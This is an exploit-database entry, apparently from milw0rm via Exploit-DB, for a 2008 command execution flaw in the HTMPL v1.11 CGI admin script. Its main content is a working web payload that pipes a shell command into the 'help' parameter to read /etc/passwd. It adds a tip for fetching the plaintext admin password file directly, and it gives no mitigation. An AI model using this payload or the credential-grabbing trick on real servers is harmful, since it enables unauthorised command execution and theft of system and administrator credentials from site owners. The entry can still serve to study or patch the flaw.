header-logo
Suggest Exploit
vendor:
HTMPL
by:
ZeN
7.5
CVSS
HIGH
Command Execution
Not available
CWE
Product Name: HTMPL
Affected Version From: HTMPL v1.11
Affected Version To: HTMPL v1.11
Patch Exists: Not available
Related CWE: Not available
CPE: Not available
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Not available
2008

Command Execution

site.com/cgi-bin/htmpl_admin.cgi?help=|cat /etc/passwd A few other little..... tricks The admins password is kept plaintext in the file 'adminpass', you can just access it directly in the same directory.

Mitigation:

Not available
Source

Exploit-DB raw data:

Software : HTMPL v1.11
Download Link : http://vmeste.org/templ_ex/doc/1.html
Vulnrability : Command Execution
Severity : High
Author : ZeN
Website : http://dusecurity.com / http://darkcode.me/
 
Exploit :
site.com/cgi-bin/htmpl_admin.cgi?help=|cat /etc/passwd
 
 
A few other little..... tricks
The admins password is kept plaintext in the file 'adminpass', you can just access it directly
in the same directory.
 
Thanks str0ke ;)

Shouts to :
DU Security Group
DarkCoders
WL-Group
Milw0rm
EnigmaGroup
IWannaHack
HackHound

# milw0rm.com [2008-12-10]